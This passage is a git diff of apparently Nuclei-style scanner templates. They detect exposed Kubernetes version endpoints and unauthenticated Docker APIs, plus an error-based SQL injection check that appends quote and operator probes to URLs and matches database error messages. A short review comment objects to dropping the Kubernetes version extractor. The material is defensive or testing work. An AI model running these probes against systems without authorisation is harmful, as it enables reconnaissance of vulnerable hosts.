+++ b/poc/docker/kubernetes-version.yaml @@ -1,14 +1,9 @@ id: kubernetes-version info: name: Kubernetes Version Exposure - author: raesene,idealphase - description: Searches for exposed Kubernetes API servers which return version information unauthenticated. For Google Kubernetes Engine (GKE) and Amazon Elastic Kubernetes Service (EKS) this template will extract default patch version for you. - reference: - - https://cloud.google.com/kubernetes-engine/docs/release-notes - - https://docs.aws.amazon.com/eks/latest/userguide/kubernetes-versions.html + author: raesene + description: Searches for exposed Kubernetes API servers which return version information unauthenticated severity: info - metadata: - shodan-query: product:"Kubernetes" version:"1.21.5-eks-bc4871b" tags: tech,k8s,kubernetes,devops requests: - method: GET @@ -21,7 +16,3 @@ requests: - "goVersion" - "platform" condition: and - extractors: - - type: json - json: - - '.gitVersion' diff --git a/poc/docker/misconfigured-docker-8900.yaml b/poc/docker/misconfigured-docker-8900.yaml index 6e40631707..b5f5de6aed 100644 --- a/poc/docker/misconfigured-docker-8900.yaml +++ b/poc/docker/misconfigured-docker-8900.yaml 
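Review bot: After these two kubernetes-version.yaml hunks the template is still named "Kubernetes Version Exposure" but no longer reports a version, because the second hunk drops the `extractors` block (`type: json`, `'.gitVersion'`). A match then says only that the endpoint answered with `goVersion` and `platform` in the body, which leaves whoever handles the finding to query the server again to learn what needs patching. I would keep the extractor. The new `description` also ends without a period, unlike the other descriptions in this patch.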
@@ -1,9 +1,11 @@ id: misconfigured-docker info: - name: Misconfigured Docker on Default Port + name: Docker Container - Misconfiguration Exposure author: dhiyaneshDK severity: critical - reference: https://madhuakula.com/content/attacking-and-auditing-docker-containers-using-opensource/attacking-docker-containers/misconfiguration.html + description: A Docker container misconfiguration was discovered. The Docker daemon can listen for Docker Engine API requests via three different types of Socket - unix, tcp, and fd. With tcp enabled, the default setup provides un-encrypted and un-authenticated direct access to the Docker daemon. It is conventional to use port 2375 for un-encrypted, and port 2376 for encrypted communication with the daemon. + reference: + - https://madhuakula.com/content/attacking-and-auditing-docker-containers-using-opensource/attacking-docker-containers/misconfiguration.html tags: docker,unauth,devops requests: - method: GET @@ -20,3 +22,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/20 diff --git a/poc/elk/0xelkotsqli.yaml b/poc/elk/0xelkotsqli.yaml index d39d68d605..78257140e3 100644 --- a/poc/elk/0xelkotsqli.yaml +++ b/poc/elk/0xelkotsqli.yaml 
@@ -1,482 +1,476 @@ -id: error-based-sql-injection - -info: - name: Error based SQL injection [Edit] - author: geeknik,0xelkot - severity: high - description: Detects the possibility of SQL injection in 29 database engines. Inspired by https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml. - tags: sqli,generic,error - -requests: - - method: GET - path: - - "{{BaseURL}}'" - - '{{BaseURL}}"' - - "{{BaseURL}}+" - - "{{BaseURL}}-" - - "{{BaseURL}}*" - - "{{BaseURL}}[]" - - "{{BaseURL}}')" - - matchers-condition: and - matchers: - - type: word - words: - - "Adminer" - # False Positive - part: body - negative: true - - - type: regex - regex: - # MySQL - - "SQL syntax.*?MySQL" - - "Warning.*?\\Wmysqli?_" - - "MySQLSyntaxErrorException" - - "valid MySQL result" - - "check the manual that (corresponds to|fits) your MySQL server version" - - "Unknown column '[^ ]+' in 'field list'" - - "MySqlClient\\." - - "com\\.mysql\\.jdbc" - - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" - - "Pdo[./_\\\\]Mysql" - - "MySqlException" - - "SQLSTATE\\[\\d+\\]: Syntax error or access violation" - # MariaDB - - "check the manual that (corresponds to|fits) your MariaDB server version" - # Drizzle - - "check the manual that (corresponds to|fits) your Drizzle server version" - # MemSQL - - "MemSQL does not support this type of query" - - "is not supported by MemSQL" - - "unsupported nested scalar subselect" - # PostgreSQL - - "PostgreSQL.*?ERROR" - - "Warning.*?\\Wpg_" - - "valid PostgreSQL result" - - "Npgsql\\." - - "PG::SyntaxError:" - - "org\\.postgresql\\.util\\.PSQLException" - - "ERROR:\\s\\ssyntax error at or near" - - "ERROR: parser: parse error at or near" - - "PostgreSQL query failed" - - "org\\.postgresql\\.jdbc" - - "Pdo[./_\\\\]Pgsql" - - "PSQLException" - # Microsoft SQL Server - - "Driver.*? SQL[\\-\\_\\ ]*Server" - - "OLE DB.*? 
SQL Server" - - "\\bSQL Server[^<"]+Driver" - - "Warning.*?\\W(mssql|sqlsrv)_" - - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" - - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" - - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." - - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" - - "\\[SQL Server\\]" - - "ODBC SQL Server Driver" - - "ODBC Driver \\d+ for SQL Server" - - "SQLServer JDBC Driver" - - "com\\.jnetdirect\\.jsql" - - "macromedia\\.jdbc\\.sqlserver" - - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" - - "com\\.microsoft\\.sqlserver\\.jdbc" - - "Pdo[./_\\\\](Mssql|SqlSrv)" - - "SQL(Srv|Server)Exception" - - "Unclosed quotation mark after the character string" - # Microsoft Access - - "Microsoft Access (\\d+ )?Driver" - - "JET Database Engine" - - "Access Database Engine" - - "ODBC Microsoft Access" - - "Syntax error \\(missing operator\\) in query expression" - # Oracle - - "\\bORA-\\d{5}" - - "Oracle error" - - "Oracle.*?Driver" - - "Warning.*?\\W(oci|ora)_" - - "quoted string not properly terminated" - - "SQL command not properly ended" - - "macromedia\\.jdbc\\.oracle" - - "oracle\\.jdbc" - - "Zend_Db_(Adapter|Statement)_Oracle_Exception" - - "Pdo[./_\\\\](Oracle|OCI)" - - "OracleException" - # IBM DB2 - - "CLI Driver.*?DB2" - - "DB2 SQL error" - - "\\bdb2_\\w+\\(" - - "SQLCODE[=:\\d, -]+SQLSTATE" - - "com\\.ibm\\.db2\\.jcc" - - "Zend_Db_(Adapter|Statement)_Db2_Exception" - - "Pdo[./_\\\\]Ibm" - - "DB2Exception" - - "ibm_db_dbi\\.ProgrammingError" - # Informix - - "Warning.*?\\Wifx_" - - "Exception.*?Informix" - - "Informix ODBC Driver" - - "ODBC Informix driver" - - "com\\.informix\\.jdbc" - - "weblogic\\.jdbc\\.informix" - - "Pdo[./_\\\\]Informix" - - "IfxException" - # Firebird - - "Dynamic SQL Error" - - "Warning.*?\\Wibase_" - - "org\\.firebirdsql\\.jdbc" - - "Pdo[./_\\\\]Firebird" - # SQLite - - "SQLite/JDBCDriver" - - "SQLite\\.Exception" - - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" - - 
"Warning.*?\\W(sqlite_|SQLite3::)" - - "\\[SQLITE_ERROR\\]" - - "SQLite error \\d+:" - - "sqlite3.OperationalError:" - - "SQLite3::SQLException" - - "org\\.sqlite\\.JDBC" - - "Pdo[./_\\\\]Sqlite" - - "SQLiteException" - # SAP MaxDB - - "SQL error.*?POS([0-9]+)" - - "Warning.*?\\Wmaxdb_" - - "DriverSapDB" - - "-3014.*?Invalid end of SQL statement" - - "com\\.sap\\.dbtech\\.jdbc" - - "\\[-3008\\].*?: Invalid keyword or missing delimiter" - # Sybase - - "Warning.*?\\Wsybase_" - - "Sybase message" - - "Sybase.*?Server message" - - "SybSQLException" - - "Sybase\\.Data\\.AseClient" - - "com\\.sybase\\.jdbc" - # Ingres - - "Warning.*?\\Wingres_" - - "Ingres SQLSTATE" - - "Ingres\\W.*?Driver" - - "com\\.ingres\\.gcf\\.jdbc" - # FrontBase - - "Exception (condition )?\\d+\\. Transaction rollback" - - "com\\.frontbase\\.jdbc" - - "Syntax error 1. Missing" - - "(Semantic|Syntax) error [1-4]\\d{2}\\." - # HSQLDB - - "Unexpected end of command in statement \\[" - - "Unexpected token.*?in statement \\[" - - "org\\.hsqldb\\.jdbc" - # H2 - - "org\\.h2\\.jdbc" - - "\\[42000-192\\]" - # MonetDB - - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" - - "\\[MonetDB\\]\\[ODBC Driver" - - "nl\\.cwi\\.monetdb\\.jdbc" - # Apache Derby - - "Syntax error: Encountered" - - "org\\.apache\\.derby" - - "ERROR 42X01" - # Vertica - - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" - - "/vertica/Parser/scan" - - "com\\.vertica\\.jdbc" - - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" - - "com\\.vertica\\.dsi\\.dataengine" - # Mckoi - - "com\\.mckoi\\.JDBCDriver" - - "com\\.mckoi\\.database\\.jdbc" - - "<REGEX_LITERAL>" - # Presto - - "com\\.facebook\\.presto\\.jdbc" - - "io\\.prestosql\\.jdbc" - - "com\\.simba\\.presto\\.jdbc" - - "UNION query has different number of fields: \\d+, \\d+" - # Altibase - - "Altibase\\.jdbc\\.driver" - # MimerSQL - - "com\\.mimer\\.jdbc" - - "Syntax error,[^\\n]+assumed to mean" - # CrateDB - - "io\\.crate\\.client\\.jdbc" - # Cache - - 
"encountered after end of query" - - "A comparison operator is required here" - # Raima Database Manager - - "-10048: Syntax error" - - "rdmStmtPrepare\\(.+?\\) returned" - # Virtuoso - - "SQ074: Line \\d+:" - - "SR185: Undefined procedure" - - "SQ200: No table " - - "Virtuoso S0002 Error" - - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" - condition: or - - extractors: - - type: regex - name: MySQL - regex: - - "SQL syntax.*?MySQL" - - "Warning.*?\\Wmysqli?_" - - "MySQLSyntaxErrorException" - - "valid MySQL result" - - "check the manual that (corresponds to|fits) your MySQL server version" - - "Unknown column '[^ ]+' in 'field list'" - - "MySqlClient\\." - - "com\\.mysql\\.jdbc" - - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" - - "Pdo[./_\\\\]Mysql" - - "MySqlException" - - "SQLSTATE[\\d+]: Syntax error or access violation" - - - type: regex - name: MariaDB - regex: - - "check the manual that (corresponds to|fits) your MariaDB server version" - - - type: regex - name: Drizzel - regex: - - "check the manual that (corresponds to|fits) your Drizzle server version" - - - type: regex - name: MemSQL - regex: - - "MemSQL does not support this type of query" - - "is not supported by MemSQL" - - "unsupported nested scalar subselect" - - - type: regex - name: PostgreSQL - regex: - - "PostgreSQL.*?ERROR" - - "Warning.*?\\Wpg_" - - "valid PostgreSQL result" - - "Npgsql\\." - - "PG::SyntaxError:" - - "org\\.postgresql\\.util\\.PSQLException" - - "ERROR:\\s\\ssyntax error at or near" - - "ERROR: parser: parse error at or near" - - "PostgreSQL query failed" - - "org\\.postgresql\\.jdbc" - - "Pdo[./_\\\\]Pgsql" - - "PSQLException" - - - type: regex - name: MicrosoftSQLServer - regex: - - "Driver.*? SQL[\\-\\_\\ ]*Server" - - "OLE DB.*? 
SQL Server" - - "\\bSQL Server[^<"]+Driver" - - "Warning.*?\\W(mssql|sqlsrv)_" - - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" - - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" - - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." - - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" - - "\\[SQL Server\\]" - - "ODBC SQL Server Driver" - - "ODBC Driver \\d+ for SQL Server" - - "SQLServer JDBC Driver" - - "com\\.jnetdirect\\.jsql" - - "macromedia\\.jdbc\\.sqlserver" - - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" - - "com\\.microsoft\\.sqlserver\\.jdbc" - - "Pdo[./_\\\\](Mssql|SqlSrv)" - - "SQL(Srv|Server)Exception" - - "Unclosed quotation mark after the character string" - - - type: regex - name: MicrosoftAccess - regex: - - "Microsoft Access (\\d+ )?Driver" - - "JET Database Engine" - - "Access Database Engine" - - "ODBC Microsoft Access" - - "Syntax error \\(missing operator\\) in query expression" - - - type: regex - name: Oracle - regex: - - "\\bORA-\\d{5}" - - "Oracle error" - - "Oracle.*?Driver" - - "Warning.*?\\W(oci|ora)_" - - "quoted string not properly terminated" - - "SQL command not properly ended" - - "macromedia\\.jdbc\\.oracle" - - "oracle\\.jdbc" - - "Zend_Db_(Adapter|Statement)_Oracle_Exception" - - "Pdo[./_\\\\](Oracle|OCI)" - - "OracleException" - - - type: regex - name: IBMDB2 - regex: - - "CLI Driver.*?DB2" - - "DB2 SQL error" - - "\\bdb2_\\w+\\(" - - "SQLCODE[=:\\d, -]+SQLSTATE" - - "com\\.ibm\\.db2\\.jcc" - - "Zend_Db_(Adapter|Statement)_Db2_Exception" - - "Pdo[./_\\\\]Ibm" - - "DB2Exception" - - "ibm_db_dbi\\.ProgrammingError" - - - type: regex - name: Informix - regex: - - "Warning.*?\\Wifx_" - - "Exception.*?Informix" - - "Informix ODBC Driver" - - "ODBC Informix driver" - - "com\\.informix\\.jdbc" - - "weblogic\\.jdbc\\.informix" - - "Pdo[./_\\\\]Informix" - - "IfxException" - - - type: regex - name: Firebird - regex: - - "Dynamic SQL Error" - - "Warning.*?\\Wibase_" - - "org\\.firebirdsql\\.jdbc" - - 
"Pdo[./_\\\\]Firebird" - - - type: regex - name: SQLite - regex: - - "SQLite/JDBCDriver" - - "SQLite\\.Exception" - - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" - - "Warning.*?\\W(sqlite_|SQLite3::)" - - "\\[SQLITE_ERROR\\]" - - "SQLite error \\d+:" - - "sqlite3.OperationalError:" - - "SQLite3::SQLException" - - "org\\.sqlite\\.JDBC" - - "Pdo[./_\\\\]Sqlite" - - "SQLiteException" - - - type: regex - name: SAPMaxDB - regex: - - "SQL error.*?POS([0-9]+)" - - "Warning.*?\\Wmaxdb_" - - "DriverSapDB" - - "-3014.*?Invalid end of SQL statement" - - "com\\.sap\\.dbtech\\.jdbc" - - "\\[-3008\\].*?: Invalid keyword or missing delimiter" - - - type: regex - name: Sybase - regex: - - "Warning.*?\\Wsybase_" - - "Sybase message" - - "Sybase.*?Server message" - - "SybSQLException" - - "Sybase\\.Data\\.AseClient" - - "com\\.sybase\\.jdbc" - - - type: regex - name: Ingres - regex: - - "Warning.*?\\Wingres_" - - "Ingres SQLSTATE" - - "Ingres\\W.*?Driver" - - "com\\.ingres\\.gcf\\.jdbc" - - - type: regex - name: FrontBase - regex: - - "Exception (condition )?\\d+\\. Transaction rollback" - - "com\\.frontbase\\.jdbc" - - "Syntax error 1. Missing" - - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." 
- - - type: regex - name: HSQLDB - regex: - - "Unexpected end of command in statement \\[" - - "Unexpected token.*?in statement \\[" - - "org\\.hsqldb\\.jdbc" - - - type: regex - name: H2 - regex: - - "org\\.h2\\.jdbc" - - "\\[42000-192\\]" - - - type: regex - name: MonetDB - regex: - - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" - - "\\[MonetDB\\]\\[ODBC Driver" - - "nl\\.cwi\\.monetdb\\.jdbc" - - - type: regex - name: ApacheDerby - regex: - - "Syntax error: Encountered" - - "org\\.apache\\.derby" - - "ERROR 42X01" - - - type: regex - name: Vertica - regex: - - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" - - "/vertica/Parser/scan" - - "com\\.vertica\\.jdbc" - - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" - - "com\\.vertica\\.dsi\\.dataengine" - - - type: regex - name: Mckoi - regex: - - "com\\.mckoi\\.JDBCDriver" - - "com\\.mckoi\\.database\\.jdbc" - - "<REGEX_LITERAL>" - - - type: regex - name: Presto - regex: - - "com\\.facebook\\.presto\\.jdbc" - - "io\\.prestosql\\.jdbc" - - "com\\.simba\\.presto\\.jdbc" - - "UNION query has different number of fields: \\d+, \\d+" - - - type: regex - name: Altibase - regex: - - "Altibase\\.jdbc\\.driver" - - - type: regex - name: MimerSQL - regex: - - "com\\.mimer\\.jdbc" - - "Syntax error,[^\\n]+assumed to mean" - - - type: regex - name: CrateDB - regex: - - "io\\.crate\\.client\\.jdbc" - - - type: regex - name: Cache - regex: - - "encountered after end of query" - - "A comparison operator is required here" - - - type: regex - name: RaimaDatabaseManager - regex: - - "-10048: Syntax error" - - "rdmStmtPrepare\\(.+?\\) returned" - - - type: regex - name: Virtuoso - regex: - - "SQ074: Line \\d+:" - - "SR185: Undefined procedure" - - "SQ200: No table " - - "Virtuoso S0002 Error" - - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" +id: error-based-sql-injection + +info: + name: Error based SQL injection + author: geeknik + severity: high + description: Detects the 
possibility of SQL injection in 29 database engines. Inspired by https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml. + tags: sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/'" + + matchers-condition: and + matchers: + - type: word + words: + - "Adminer" + # False Positive + part: body + negative: true + + - type: regex + regex: + # MySQL + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE\\[\\d+\\]: Syntax error or access violation" + # MariaDB + - "check the manual that (corresponds to|fits) your MariaDB server version" + # Drizzle + - "check the manual that (corresponds to|fits) your Drizzle server version" + # MemSQL + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + # PostgreSQL + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + # Microsoft SQL Server + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." 
+ - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + # Microsoft Access + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + # Oracle + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + # IBM DB2 + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + # Informix + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + # Firebird + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + # SQLite + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + # SAP MaxDB + - "SQL error.*?POS([0-9]+)" + - 
"Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + # Sybase + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + # Ingres + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + # FrontBase + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error [1-4]\\d{2}\\." + # HSQLDB + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + # H2 + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + # MonetDB + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + # Apache Derby + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + # Vertica + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + # Mckoi + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + # Presto + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + # Altibase + - "Altibase\\.jdbc\\.driver" + # MimerSQL + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + # CrateDB + - "io\\.crate\\.client\\.jdbc" + # Cache + - "encountered after end of query" + - "A comparison operator is required here" + # Raima Database Manager + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + # Virtuoso + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - 
"Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" + condition: or + + extractors: + - type: regex + name: MySQL + regex: + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE[\\d+]: Syntax error or access violation" + + - type: regex + name: MariaDB + regex: + - "check the manual that (corresponds to|fits) your MariaDB server version" + + - type: regex + name: Drizzel + regex: + - "check the manual that (corresponds to|fits) your Drizzle server version" + + - type: regex + name: MemSQL + regex: + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + + - type: regex + name: PostgreSQL + regex: + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + + - type: regex + name: MicrosoftSQLServer + regex: + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." 
+ - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + + - type: regex + name: MicrosoftAccess + regex: + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + + - type: regex + name: Oracle + regex: + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + + - type: regex + name: IBMDB2 + regex: + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + + - type: regex + name: Informix + regex: + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + + - type: regex + name: Firebird + regex: + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + + - type: regex + name: SQLite + regex: + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + 
- "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + + - type: regex + name: SAPMaxDB + regex: + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + + - type: regex + name: Sybase + regex: + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + + - type: regex + name: Ingres + regex: + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + + - type: regex + name: FrontBase + regex: + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." + + - type: regex + name: HSQLDB + regex: + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + + - type: regex + name: H2 + regex: + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + + - type: regex + name: MonetDB + regex: + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + + - type: regex + name: ApacheDerby + regex: + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + + - type: regex + name: Vertica + regex: + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + + - type: regex + name: Mckoi + regex: + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + + - type: regex + name: Presto + regex: + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - 
